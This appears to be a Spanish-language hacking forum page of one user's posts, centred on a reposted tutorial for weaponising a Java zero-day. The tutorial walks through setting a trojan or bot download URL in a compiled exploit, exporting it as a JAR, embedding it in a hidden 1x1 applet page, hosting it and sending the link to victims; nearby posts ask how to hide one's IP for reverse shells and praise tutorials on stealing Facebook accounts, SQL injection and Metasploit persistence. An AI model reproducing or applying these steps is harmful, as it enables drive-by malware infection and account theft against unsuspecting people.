Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - andrewtwo

#21
Hola se sabe que no es posible realizar una conexión inversa mediante una VPN o proxy,  dado ese caso se debe usar la ip real para lograr la conexión,  pero entonces de que manera  puedo lograr este tipo de conexión y al mismo tiempo ocultar mi ip real   :-\

Saludos y gracias
#22


Twitter: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Facebook Fan Page:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

YouTube: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Blog: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#23
Genial bro, gracias por el articulo  ;)
#24
Escalando privilegios en cms joomla(1.6/1.7/2.5.2) Administrador/Super Administrador




Saludos
#25



Mi Canal de videos en youtube
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Sitio Web
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos
#26
Una duda con respecto a metasploit el funcionamiento seria así: ejecuto metasploit con mi ip publica algo como 209.55.102.3 y ejecuto el exploit con esa ip, si todo va bien se inicia el servidor con la siguiente url  209.55.102.3:4444 y esa es la url que le debo enviar a la victima, una ves que el haga clic activa la conexión con mi exploit que esta en escucha  y como resultado daría una session en el metasploit, creo  que esos son los pasos a seguir o se requiere de algo adicional

Saludos  ;) 

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Investigadores de seguridad de FireEye han informado de una nueva vulnerabilidad de día cero en Java que está siendo explotada activamente en Internet. Los runtime más recientes (JRE 1.7x) son también vulnerables.

Esta noticia e información esta siendo propagada por todos los Foros, Blogs de Seguridad, Redes Sociales, etc... pero solo informan de que "trata" oh como prevenirlo.

En este caso, les enseñare como aprovecharse de esta vulnerabilidad, mediante el Exploit en .JAR que ha sido compilado para explotar dicha vulnerabilidad.

Empecemos.

Descargamos el Exploit:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 
Pass: calebbucker

Necesitaremos el Programa Eclipse: 
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Disponible 32 y 64 bits, descargue dependiendo de su S.O

Instalamos JAVA 7: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Iniciamos Eclipse, seleccionamos File - Import:


Seleccionamos General - Proyectos Existentes en el Área de Trabajo:


Le damos Next, ahora click en Browser y seleccionamos la ruta del exploit descomprimido, en mi caso es C:\Documents and Settings\TioSam\Escritorio\exploit2


Seleccionamos Finish, ahora en el proyecto importado, abrimos el archivo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y editamos la linea URL website = new URL("DOWNLOADPATH"); en DOWNLOADPATCH colocaremos la url de nuestro exe (bot, troyano) la cual quedaria: URL website = new URL("No tienes permitido ver los links. Registrarse o Entrar a mi cuenta");


Ahora, abrimos el archivo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y le damos RUN, si el archivo logra abrir entonces quiere decir que todo funciona bien; si no abre compruebe que tiene JAVA 7 instalado.


Ahora, exportamos el Proyecto, click derecho sobre exploit2 y seleccionamos Export:


El proyecto tiene que ser guardado en formato JAR, por lo tanto seleccionamos Java - Jar file:


Seleccionamos Next, ahora click en Browser y seleccionamos la carpeta donde se guardara el archivo Jar en mi caso es: C:\Documents and Settings\TioSam\Escritorio\TEST\test.jar


Terminado ese paso le damos Next, Next y Finish.

Ahora, creamos un archivo html con el siguiente código:

Código: txt
<html><head></head><body><applet archive="JARNOMBRE.jar" code="applet1.class" width="1" height="1"></applet></body></html>


En mi caso el codigo queda de la siguiente manera:

Código: txt
<html><head></head><body><applet archive="test.jar" code="applet1.class" width="1" height="1"></applet></body></html>



Esos archivos la subimos en nuestro Host, de preferencia de pago.

Ahora solo queda enviar el link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta a cualquier persona.

En este caso, he configurado una Botnet (Aldi) la cual al momento que abri dicho link quede infectado :(


Esta vulnerabilidad también puede ser explotada desde Metasploit:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Espero no sean tan "ingenuos" en abrir cualquier link que le envian, por lo menos tengan desactivado JAVA hasta que salga el respectivo parche.

Saludos.

PARCHE: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#27
Esto es excelente !!!!! lo analizare después con calma  ;)
#28
super bien bro  ;) una pregunta podrías por favor explicar como compilaste el exploit en linux, gracias
#29
buen post  ;) toca analizar los videos porque entender el ingles quedo asi  :o
#30
a probar que tal  ;D
#31
nunca me he podido sacar una de cpanel con este metodo  :-\
#32
No validar en el servidor es faltal  :o
#33
lo que me llamo la atención fue <span style="text-decoration: none">Click Here To Download Tar File</span></font></a></p>';  ::)
#34
Genial no me sabia el  run metsvc
  • veo que es xp hay que ver si funciona con otras versiones igual, buen dato  ;)
#35
Me gusto por la combinación con metasploit  ;)
#36
me gusto esa forma de obtener cuenta de facebook aunque la comparación es tediosa  ;D
#37
lo revisare a ver que tal  ;)
#38
Uso backtrack sin duda me servirá aunque me ha pasado que cuando actualizo alguna tool luego me tira error me ha pasado en backtrack5r2, gracias por el dato
#39
tambien se podria camuflar en un plugin,modulo o componente buen tuto  ;)
#40
claro muchas veces me pregunte como el havij pasaba los injection y recuperaba datos, muy buen dato